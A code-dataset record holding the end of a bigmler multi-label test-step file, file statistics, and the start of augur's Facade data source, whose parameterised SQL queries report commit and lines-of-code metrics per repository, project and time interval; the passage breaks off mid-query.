test = res_filename(test)
try:
command = ("bigmler --multi-label --model-tag " + tag + " --labels " +
labels + " --test " + test + " --store --output " + output +
" --max-batch-models 1")
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.test_lines = file_number_of_lines(test)
# test file has headers in it, so first line must be ignored
world.test_lines -= 1
world.output = output
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
#@step(r'Then I check the extended file "(.*)" has been created')
def i_check_local_file(step, path=None):
if path is None:
assert False
try:
handler = open(path, "r")
world.headers = handler.readline().strip()
world.first_row = handler.readline().strip()
except IOError:
assert False
#@step(r'the headers of the local extended file are "(.*)"')
def i_check_headers_file(step, headers=None):
if headers is None:
assert False
if headers == world.headers:
assert True
else:
assert False, ("The expected headers are:\n%s\nand the"
" ones found are:\n%s" % (headers, world.headers))
#@step(r'the first row of the local extended file is "(.*)"')
def i_check_first_row_file(step, first_row=None):
if first_row is None:
assert False
if first_row == world.first_row:
assert True
else:
assert False, ("The expected first row is:\n%s\n"
"and the one found is:\n%s" % (first_row,
world.first_row))
#@step(r'I create BigML a multi-label source with "(.*)" label separator and (\d+) labels from train "(.*)" file with "(.*)" field separator and "(.*)" as multi-label fields and objective "(.*)" and output in "(.*)"')
def i_create_ml_source(step, label_separator=None, number_of_labels=None, data=None, training_separator=None, multi_label_fields=None, objective=None, output_dir=None):
if label_separator is None or training_separator is None or number_of_labels is None or data is None or multi_label_fields is None or output_dir is None or objective is None:
assert False
world.directory = output_dir
world.folders.append(world.directory)
try:
command = ("bigmler --multi-label --train " + res_filename(data) +
" --label-separator \"" + label_separator +
"\" --training-separator \"" + training_separator +
"\" --multi-label-fields " + multi_label_fields +
" --objective " + objective + " --store --output-dir " +
output_dir +
" --no-dataset --no-model --max-batch-models 1")
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.output = output_dir
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
#@step(r'I create BigML multi-label resources tagged as "(.*)" with "(.*)" label separator and (\d*) labels uploading train "(.*)" file with "(.*)" field separator and (\d+) models ensembles to test "(.*)" and log predictions in "(.*)"')
def i_create_all_ml_resources_and_ensembles(step, tag=None, label_separator=None, number_of_labels=None, data=None, training_separator=None, number_of_models=None, test=None, output=None):
if tag is None or label_separator is None or training_separator is None or number_of_labels is None or data is None or test is None or output is None or number_of_models is None:
assert False
world.directory = os.path.dirname(output)
world.folders.append(world.directory)
world.number_of_models = int(number_of_labels) * int(number_of_models)
test = res_filename(test)
try:
command = ("bigmler --multi-label --train " + res_filename(data) +
" --label-separator \"" + label_separator +
"\" --training-separator \"" + training_separator +
"\" --test " + test + " --number-of-models " +
str(number_of_models) + " --store --output " + output +
" --tag " + tag + " --max-batch-models 1")
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.test_lines = file_number_of_lines(test)
# test file has headers in it, so first line must be ignored
world.test_lines -= 1
world.output = output
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
#@step(r'I create BigML (multi-label\s)?resources using source and (\d+) models ensembles to test "(.*)" and log predictions in "(.*)"')
def i_create_resources_and_ensembles_from_source(step, multi_label=None, number_of_models=None, test=None, output=None):
if test is None or output is None or number_of_models is None:
assert False
world.directory = os.path.dirname(output)
world.folders.append(world.directory)
multi_label = "" if multi_label is None else " --multi-label "
test = res_filename(test)
try:
command = ("bigmler "+ multi_label +"--source " +
world.source['resource'] + " --number-of-models " +
str(number_of_models) + " --test " + test +
" --store --output " + output)
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.test_lines = file_number_of_lines(test)
# test file has headers in it, so first line must be ignored
world.test_lines -= 1
world.output = output
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
#@step(r'I create BigML (multi-label\s)?resources using dataset and (\d+) models ensembles to test "(.*)" and log predictions in "(.*)"')
def i_create_resources_and_ensembles_from_dataset(step, multi_label=None, number_of_models=None, test=None, output=None):
if test is None or output is None:
assert False
world.directory = os.path.dirname(output)
world.folders.append(world.directory)
multi_label = "" if multi_label is None else " --multi-label "
test = res_filename(test)
try:
command = ("bigmler "+ multi_label +"--dataset " +
world.dataset['resource'] + " --number-of-models " +
str(number_of_models) + " --test " + test +
" --store --output " + output)
command = check_debug(command)
retcode = check_call(command, shell=True)
if retcode < 0:
assert False
else:
world.test_lines = file_number_of_lines(test)
# test file has headers in it, so first line must be ignored
world.test_lines -= 1
world.output = output
assert True
except (OSError, CalledProcessError, IOError) as exc:
assert False, str(exc)
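Every step above builds one shell string and dispatches it through check_call(command, shell=True), treating any OSError or CalledProcessError as a failed assertion. A hedged sketch of the same dispatch pattern without an intermediate shell, splitting the string with shlex instead (equivalent for simple commands and avoids shell quoting pitfalls; this is an alternative pattern, not how bigmler itself must be invoked):

import shlex
from subprocess import check_call, CalledProcessError

def run_command(command):
    # Tokenize the command string into argv form and run it directly;
    # check_call raises CalledProcessError on a non-zero exit status.
    try:
        check_call(shlex.split(command))
        return True
    except (OSError, CalledProcessError):
        return False

# Example (assumes a 'bigmler' executable on PATH):
# run_command("bigmler --train data.csv --test test.csv --store --output out")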
| 48.066667
| 290
| 0.620804
| 1,852
| 14,420
| 4.704104
| 0.094492
| 0.03719
| 0.036731
| 0.023416
| 0.811983
| 0.792126
| 0.786272
| 0.767447
| 0.760331
| 0.760331
| 0
| 0.003508
| 0.268516
| 14,420
| 299
| 291
| 48.227425
| 0.822431
| 0.199029
| 0
| 0.739669
| 0
| 0
| 0.088848
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 1
| 0.049587
| false
| 0
| 0.033058
| 0
| 0.082645
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1396bebd1db58c077d1864585f8401f712788dc8
| 37,324
|
py
|
Python
|
augur/datasources/facade/facade.py
|
Szong06/augur
|
9ceac23dd08d00d27f50ed5ef6320a05790a0a51
|
[
"MIT"
] | 3
|
2019-03-15T20:37:37.000Z
|
2019-03-15T22:09:16.000Z
|
augur/datasources/facade/facade.py
|
Szong06/augur
|
9ceac23dd08d00d27f50ed5ef6320a05790a0a51
|
[
"MIT"
] | 4
|
2020-07-07T19:53:05.000Z
|
2022-01-22T04:33:12.000Z
|
augur/datasources/facade/facade.py
|
Szong06/augur
|
9ceac23dd08d00d27f50ed5ef6320a05790a0a51
|
[
"MIT"
] | null | null | null |
#SPDX-License-Identifier: MIT
"""
Data source that uses Facade's tables
"""
import base64
import pandas as pd
import sqlalchemy as s
from augur import logger
from augur.util import annotate
# end imports
# (don't remove the above line, it's for a script)
class Facade(object):
"""Queries Facade"""
def __init__(self, user, password, host, port, dbname, projects=None):
"""
Connect to the database
:param dbstr: The [database string](http://docs.sqlalchemy.org/en/latest/core/engines.html) to connect to the GHTorrent database
"""
self.DB_STR = 'mysql+pymysql://{}:{}@{}:{}/{}'.format(
user, password, host, port, dbname
)
logger.debug('Facade: Connecting to {}:{}/{} as {}'.format(host, port, dbname, user))
self.db = s.create_engine(self.DB_STR, poolclass=s.pool.NullPool)
self.projects = projects
#####################################
### DIVERSITY AND INCLUSION ###
#####################################
#####################################
### GROWTH, MATURITY, AND DECLINE ###
#####################################
#####################################
### RISK ###
#####################################
#####################################
### VALUE ###
#####################################
#####################################
### ACTIVITY ###
#####################################
#####################################
### EXPERIMENTAL ###
#####################################
@annotate(tag='downloaded-repos')
def downloaded_repos(self):
"""
Returns all repository names, URLs, and base64 URLs in the facade database
"""
downloadedReposSQL = s.sql.text("""
SELECT git AS url, status, projects.name as project_name
FROM repos
JOIN projects
ON repos.projects_id = projects.id
""")
results = pd.read_sql(downloadedReposSQL, self.db)
results['url'] = results['url'].apply(lambda datum: datum.split('//')[1])
if self.projects:
results = results[results.project_name.isin(self.projects)]
b64_urls = []
for i in results.index:
b64_urls.append(base64.b64encode((results.at[i, 'url']).encode()))
results['base64_url'] = b64_urls
return results
@annotate(tag='lines-changed-by-author')
def lines_changed_by_author(self, repo_url):
"""
Returns number of lines changed per author per day
:param repo_url: the repository's URL
"""
linesChangedByAuthorSQL = s.sql.text("""
SELECT author_email, author_date, author_affiliation as affiliation, SUM(added) as additions, SUM(removed) as deletions, SUM(whitespace) as whitespace
FROM analysis_data
WHERE repos_id = (SELECT id FROM repos WHERE git LIKE :repourl LIMIT 1)
GROUP BY repos_id, author_date, author_affiliation, author_email
ORDER BY author_date ASC;
""")
results = pd.read_sql(linesChangedByAuthorSQL, self.db, params={"repourl": '%{}%'.format(repo_url)})
return results
@annotate(tag='lines-changed-by-week')
def lines_changed_by_week(self, repo_url):
"""
Returns lines changed of a sent repository per week
:param repo_url: the repository's URL
"""
linesChangedByWeekSQL = s.sql.text("""
SELECT date(author_date) as date, SUM(added) as additions, SUM(removed) as deletions, SUM(whitespace) as whitespace
FROM analysis_data
WHERE repos_id = (SELECT id FROM repos WHERE git LIKE :repourl LIMIT 1)
GROUP BY YEARWEEK(author_date)
ORDER BY YEARWEEK(author_date) ASC
""")
results = pd.read_sql(linesChangedByWeekSQL, self.db, params={"repourl": '%{}%'.format(repo_url)})
return results
@annotate(tag='lines-changed-by-month')
def lines_changed_by_month(self, repo_url):
"""
Returns lines changed of a sent repository per month
:param repo_url: the repository's URL
"""
linesChangedByMonthSQL = s.sql.text("""
SELECT email as author_email, affiliation, month, year, SUM(added) as additions, SUM(removed) as deletions, SUM(whitespace) as whitespace FROM repo_monthly_cache
WHERE repos_id = (SELECT id FROM repos WHERE git LIKE :repourl LIMIT 1)
GROUP BY email, month, year
ORDER BY year, month, email ASC
""")
results = pd.read_sql(linesChangedByMonthSQL, self.db, params={"repourl": '%{}%'.format(repo_url)})
return results
@annotate(tag='commits-by-week')
def commits_by_week(self, repo_url):
"""
Returns number of patches per commiter per week
:param repo_url: the repository's URL
"""
commitsByMonthSQL = s.sql.text("""
SELECT email AS author_email, affiliation, WEEK AS `week`, YEAR AS `year`, patches FROM repo_weekly_cache
WHERE repos_id = (SELECT id FROM repos WHERE git LIKE :repourl LIMIT 1)
GROUP BY email, WEEK, YEAR
ORDER BY YEAR, WEEK, email ASC
""")
results = pd.read_sql(commitsByMonthSQL, self.db, params={"repourl": '%{}%'.format(repo_url)})
return results
# cd - code
# rg - repo group
# tp - time period (fixed time period)
# interval
# ranked - ordered top to bottom
# commits
# loc - lines of code
# rep - repo
# ua - unaffiliated
@annotate(tag='cd-rg-newrep-ranked-commits')
def cd_rg_newrep_ranked_commits(self, repo_url, calendar_year=None, repo_group=None):
"""
For each repository in a collection of repositories being managed, each REPO that first appears in the parameterized
calendar year (a new repo in that year),
show all commits for that year (total for year by repo).
Result ranked from highest number of commits to lowest by default.
:param repo_url: the repository's URL
:param calendar_year: the calendar year a repo is created in to be considered "new"
:param repo_group: the group of repositories to analyze
"""
if calendar_year is None:
calendar_year = 2018
if repo_group is None:
repo_group = 'facade_project'
cdRgNewrepRankedCommitsSQL = None
if repo_group == 'facade_project':
cdRgNewrepRankedCommitsSQL = s.sql.text("""
SELECT repos_id, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches, repos.name
FROM repo_annual_cache, projects, repos
where projects.name = (SELECT projects.name FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
and YEAR(repos.added) = :calendar_year
LIMIT 1)
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
else:
cdRgNewrepRankedCommitsSQL = s.sql.text("""
SELECT repos_id, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches, projects.name
FROM repo_annual_cache, projects, repos
where projects.name = :repo_group
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
and YEAR(repos.added) = :calendar_year
group by repos_id
ORDER BY net desc
LIMIT 10
""")
results = pd.read_sql(cdRgNewrepRankedCommitsSQL, self.db, params={"repourl": '%{}%'.format(repo_url), "repo_group": repo_group, "calendar_year": calendar_year})
return results
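# Hedged usage sketch (the URL and group name are illustrative):
#
#     top_new = metrics.cd_rg_newrep_ranked_commits(
#         'github.com/org/repo', calendar_year=2018, repo_group='facade_project')
#
# returns at most 10 rows, one per new repo, carrying `net` (added - removed
# - whitespace) and `patches` columns, ordered by `net` descending.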
@annotate(tag='cd-rg-newrep-ranked-loc')
def cd_rg_newrep_ranked_loc(self, repo_url, calendar_year=None, repo_group=None):
"""
For each repository in a managed collection that first appears in the parameterized calendar year
(i.e. a repo that is "new" in that year), show the total lines of code for that year, by repo.
Results are ranked from the highest net lines of code to the lowest by default.
:param repo_url: the repository's URL
:param calendar_year: the calendar year in which a repo must first appear to be considered "new"
:param repo_group: the group of repositories to analyze
"""
if calendar_year is None:
calendar_year = 2018
if repo_group is None:
repo_group = 'facade_project'
cdRgNewrepRankedLocSQL = None
if repo_group == 'facade_project':
cdRgNewrepRankedLocSQL = s.sql.text("""
SELECT repos_id, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches, repos.name
FROM repo_annual_cache, projects, repos
where projects.name = (SELECT projects.name FROM repos, projects
WHERE git LIKE :repourl
and YEAR(repos.added) = :calendar_year
and repos.projects_id = projects.id
LIMIT 1)
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
else:
cdRgNewrepRankedLocSQL = s.sql.text("""
SELECT repos_id, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches, projects.name
FROM repo_annual_cache, projects, repos
where projects.name = :repo_group
and repos.projects_id = projects.id
and YEAR(repos.added) = :calendar_year
and repo_annual_cache.repos_id = repos.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
results = pd.read_sql(cdRgNewrepRankedLocSQL, self.db, params={"repourl": '%{}%'.format(repo_url), "repo_group": repo_group, "calendar_year": calendar_year})
return results
@annotate(tag='cd-rg-tp-ranked-commits')
def cd_rg_tp_ranked_commits(self, repo_url, timeframe=None, repo_group=None):
"""
For each repository in a managed collection, the repo's total commits over all time or during the current
year or month. Results are ranked from the highest number of commits to the lowest by default.
:param repo_url: the repository's URL
:param timeframe: 'all', 'year', or 'month'. Contribution data from the timeframe containing the current date is considered
:param repo_group: the group of repositories to analyze
"""
if repo_group is None:
repo_group = 'facade_project'
if timeframe is None:
timeframe = 'all'
cdRgTpRankedCommitsSQL = None
if repo_group == 'facade_project':
if timeframe == "all":
cdRgTpRankedCommitsSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_annual_cache, projects, repos
where projects.name = (SELECT projects.name FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
LIMIT 1)
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
elif timeframe == "year":
cdRgTpRankedCommitsSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_annual_cache, projects, repos
where projects.name = (SELECT projects.name FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
and YEAR(repos.added) = YEAR(CURDATE())
LIMIT 1)
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
elif timeframe == 'month':
cdRgTpRankedCommitsSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_monthly_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_monthly_cache, projects, repos
where projects.name = (SELECT projects.name FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
and YEAR(repos.added) = YEAR(CURDATE())
and MONTH(repos.added) = MONTH(CURDATE())
LIMIT 1)
and repo_monthly_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
else:
if timeframe == "all":
cdRgTpRankedCommitsSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_annual_cache, projects, repos
where projects.name = :repo_group
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
elif timeframe == "year":
cdRgTpRankedCommitsSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_annual_cache, projects, repos
where projects.name = :repo_group
and repo_annual_cache.repos_id = repos.id
and YEAR(repos.added) = YEAR(CURDATE())
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
elif timeframe == 'month':
cdRgTpRankedCommitsSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_monthly_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_monthly_cache, projects, repos
where projects.name = :repo_group
and repo_monthly_cache.repos_id = repos.id
and YEAR(repos.added) = YEAR(CURDATE())
and MONTH(repos.added) = MONTH(CURDATE())
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
results = pd.read_sql(cdRgTpRankedCommitsSQL, self.db, params={"repourl": '%{}%'.format(repo_url), "repo_group": repo_group})
return results
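# Note: despite "commits" in the tag, the ORDER BY above ranks by `net` lines
# (added - removed - whitespace); the commit count rides along in the
# `patches` column. A caller wanting a strict commit ranking would re-sort
# the returned frame, e.g. results.sort_values('patches', ascending=False).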
@annotate(tag='cd-rg-tp-ranked-loc')
def cd_rg_tp_ranked_loc(self, repo_url, timeframe=None, repo_group=None):
"""
For each repository in a managed collection, the repo's net lines of code over all time or during the current
year or month. Results are ranked from the highest LOC to the lowest by default.
:param repo_url: the repository's URL
:param timeframe: 'all', 'year', or 'month'. Contribution data from the timeframe containing the current date is considered
:param repo_group: the group of repositories to analyze
"""
if repo_group is None:
repo_group = 'facade_project'
if timeframe is None:
timeframe = 'all'
cdRgTpRankedLocSQL = None
if repo_group == 'facade_project':
if timeframe == "all":
cdRgTpRankedLocSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_annual_cache, projects, repos
where projects.name = (SELECT projects.name FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
LIMIT 1)
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
elif timeframe == "year":
cdRgTpRankedLocSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_annual_cache, projects, repos
where projects.name = (SELECT projects.name FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
and YEAR(repos.added) = YEAR(CURDATE())
LIMIT 1)
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
elif timeframe == 'month':
cdRgTpRankedLocSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_monthly_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_monthly_cache, projects, repos
where projects.name = (SELECT projects.name FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
and YEAR(repos.added) = YEAR(CURDATE())
and MONTH(repos.added) = MONTH(CURDATE())
LIMIT 1)
and repo_monthly_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
else:
if timeframe == "all":
cdRgTpRankedLocSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_annual_cache, projects, repos
where projects.name = :repo_group
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
elif timeframe == "year":
cdRgTpRankedLocSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_annual_cache, projects, repos
where projects.name = :repo_group
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
and YEAR(repos.added) = YEAR(CURDATE())
group by repos_id
ORDER BY net desc
LIMIT 10
""")
elif timeframe == 'month':
cdRgTpRankedLocSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_monthly_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_monthly_cache, projects, repos
where projects.name = :repo_group
and repo_monthly_cache.repos_id = repos.id
and repos.projects_id = projects.id
and YEAR(repos.added) = YEAR(CURDATE())
and MONTH(repos.added) = MONTH(CURDATE())
group by repos_id
ORDER BY net desc
LIMIT 10
""")
results = pd.read_sql(cdRgTpRankedLocSQL, self.db, params={"repourl": '%{}%'.format(repo_url), "repo_group": repo_group})
return results
@annotate(tag='cd-rep-tp-interval-loc-commits')
def cd_rep_tp_interval_loc_commits(self, repo_url, calendar_year=None, interval=None):
"""
For a single repository, all the commits and lines of code occurring in the specified year, grouped by the specified interval (week or month)
:param repo_url: the repository's URL
:param calendar_year: the calendar year to examine
:param interval: 'month' or 'week'. The periodicity at which to examine data within the given calendar_year
"""
if calendar_year is None:
calendar_year = 2018
if interval is None:
interval = 'month'
cdRepTpIntervalLocCommitsSQL = None
if interval == "month":
cdRepTpIntervalLocCommitsSQL = s.sql.text("""
SELECT sum(cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace,
sum(IFNULL(added, 0)) as added, sum(IFNULL(removed, 0)) as removed, sum(IFNULL(whitespace, 0)) as whitespace,
IFNULL(patches, 0) as commits, a.month, IFNULL(year, :calendar_year) as year
FROM (select month from repo_monthly_cache group by month) a
LEFT JOIN (SELECT name, repo_monthly_cache.added, removed, whitespace, patches, month, IFNULL(year, :calendar_year) as year
FROM repo_monthly_cache, repos
WHERE repos_id = (SELECT id FROM repos WHERE git LIKE :repourl LIMIT 1)
AND year = :calendar_year
AND repos.id = repos_id
GROUP BY month) b
ON a.month = b.month
GROUP BY month
""")
elif interval == "week":
cdRepTpIntervalLocCommitsSQL = s.sql.text("""
SELECT sum(cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace,
sum(IFNULL(added, 0)) as added, sum(IFNULL(removed, 0)) as removed, sum(IFNULL(whitespace, 0)) as whitespace,
IFNULL(patches, 0) as commits, a.week, IFNULL(year, :calendar_year) as year
FROM (select week from repo_weekly_cache group by week) a
LEFT JOIN (SELECT name, repo_weekly_cache.added, removed, whitespace, patches, week, IFNULL(year, :calendar_year) as year
FROM repo_weekly_cache, repos
WHERE repos_id = (SELECT id FROM repos WHERE git LIKE :repourl LIMIT 1)
AND year = :calendar_year
AND repos.id = repos_id
GROUP BY week) b
ON a.week = b.week
GROUP BY week
""")
results = pd.read_sql(cdRepTpIntervalLocCommitsSQL, self.db, params={"repourl": '%{}%'.format(repo_url), 'calendar_year': calendar_year})
return results
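# The LEFT JOIN above is a "calendar padding" pattern: subquery (a) enumerates
# every month (or week) present in the cache, subquery (b) carries this repo's
# actual totals, so intervals with no activity still come back as rows of
# IFNULL()-ed zeros instead of disappearing. A minimal pandas sketch of the
# same idea (illustrative only):
#
#     all_months = pd.DataFrame({'month': range(1, 13)})
#     padded = all_months.merge(results, on='month', how='left').fillna(0)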
@annotate(tag='cd-rep-tp-interval-loc-commits-ua')
def cd_rep_tp_interval_loc_commits_ua(self, repo_url, calendar_year=None, interval=None, repo_group=None):
"""
For a single repository, all the commits and lines of code occurring in the specified year, grouped by the specified interval
(week or month) and by the affiliation of individuals and domains that are not mapped as "inside" within the repository's gitdm file.
"Unknown" is, in this case, interpreted as "outside".
:param repo_url: the repository's URL
:param calendar_year: the calendar year to examine
:param interval: 'month' or 'week'. The periodicity at which to examine data within the given calendar_year
:param repo_group: the group of repositories to analyze
"""
if calendar_year is None:
calendar_year = 2018
if interval is None:
interval = 'month'
if repo_group is None:
repo_group = 'facade_project'
cdRepTpIntervalLocCommitsUaSQL = None
if repo_group == 'facade_project':
if interval == "month":
cdRepTpIntervalLocCommitsUaSQL = s.sql.text("""
SELECT added, whitespace, removed, (cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace, patches, a.month, affiliation
FROM (SELECT month FROM repo_monthly_cache GROUP BY month) a
LEFT JOIN
(
SELECT SUM(repo_monthly_cache.added) AS added, SUM(whitespace) as whitespace, SUM(removed) as removed, month, SUM(patches) as patches, repo_monthly_cache.`affiliation` as affiliation
FROM repo_monthly_cache, repos, projects
WHERE repo_monthly_cache.repos_id = repos.id
AND repos.projects_id = (SELECT projects.id FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
LIMIT 1)
AND projects.id = repos.projects_id
AND repo_monthly_cache.`affiliation` <> projects.name
AND year = :calendar_year
GROUP BY month, affiliation
) b ON a.month = b.month
ORDER BY month
""")
elif interval == "week":
cdRepTpIntervalLocCommitsUaSQL = s.sql.text("""
SELECT added, whitespace, removed, (cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace, patches, a.week, affiliation
FROM (SELECT week FROM repo_weekly_cache GROUP BY week) a
LEFT JOIN
(
SELECT SUM(repo_weekly_cache.added) AS added, SUM(whitespace) as whitespace, SUM(removed) as removed, week, SUM(patches) as patches, repo_weekly_cache.`affiliation` as affiliation
FROM repo_weekly_cache, repos, projects
WHERE repo_weekly_cache.repos_id = repos.id
AND repos.projects_id = (SELECT projects.id FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
LIMIT 1)
AND projects.id = repos.projects_id
AND repo_weekly_cache.`affiliation` <> projects.name
AND year = :calendar_year
GROUP BY week, affiliation
) b ON a.week = b.week
ORDER BY week
""")
else:
if interval == "month":
cdRepTpIntervalLocCommitsUaSQL = s.sql.text("""
SELECT added, whitespace, removed, (cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace, patches, a.month, affiliation
FROM (SELECT month FROM repo_monthly_cache GROUP BY month) a
LEFT JOIN
(
SELECT SUM(repo_monthly_cache.added) AS added, SUM(whitespace) as whitespace, SUM(removed) as removed, month, SUM(patches) as patches, repo_monthly_cache.`affiliation` as affiliation
FROM repo_monthly_cache, repos, projects
WHERE repo_monthly_cache.repos_id = repos.id
AND repos.projects_id = :repo_group
AND projects.id = repos.projects_id
AND repo_monthly_cache.`affiliation` <> projects.name
AND year = :calendar_year
GROUP BY month, affiliation
) b ON a.month = b.month
ORDER BY month
""")
elif interval == "week":
cdRepTpIntervalLocCommitsUaSQL = s.sql.text("""
SELECT added, whitespace, removed, (cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace, patches, a.week, affiliation
FROM (SELECT week FROM repo_weekly_cache GROUP BY week) a
LEFT JOIN
(
SELECT SUM(repo_weekly_cache.added) AS added, SUM(whitespace) as whitespace, SUM(removed) as removed, week, SUM(patches) as patches, repo_weekly_cache.`affiliation` as affiliation
FROM repo_weekly_cache, repos, projects
WHERE repo_weekly_cache.repos_id = repos.id
AND repos.projects_id = :repo_group
AND projects.id = repos.projects_id
AND repo_weekly_cache.`affiliation` <> projects.name
AND year = :calendar_year
GROUP BY week, affiliation
) b ON a.week = b.week
ORDER BY week
""")
results = pd.read_sql(cdRepTpIntervalLocCommitsUaSQL, self.db, params={"repourl": '%{}%'.format(repo_url), "repo_group": repo_group, 'calendar_year': calendar_year})
return results
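# "Unaffiliated" is implemented above as repo_*_cache.affiliation <>
# projects.name: any contributor whose gitdm affiliation differs from the
# project's own name, which is how "Unknown" ends up counted as "outside"
# per the docstring.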
@annotate(tag='cd-rg-tp-interval-loc-commits')
def cd_rg_tp_interval_loc_commits(self, repo_url, calendar_year=None, interval=None, repo_group=None):
"""
For each repository in a collection of repositories, all the commits and lines of code occurring in the specified year,
grouped by repository and the specified interval (week or month). Results are ordered by repo.
:param repo_url: the repository's URL
:param calendar_year: the calendar year to examine
:param interval: 'month' or 'week'. The periodicity at which to examine data within the given calendar_year
:param repo_group: the group of repositories to analyze
"""
if calendar_year is None:
calendar_year = 2019
if interval is None:
interval = 'month'
if repo_group is None:
repo_group = 'facade_project'
cdRgTpIntervalLocCommitsSQL = None
if repo_group == 'facade_project':
if interval == "month":
cdRgTpIntervalLocCommitsSQL = s.sql.text("""
SELECT name, added, whitespace, removed, (cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace, patches, a.month
FROM (SELECT month FROM repo_monthly_cache GROUP BY month) a
LEFT JOIN
(
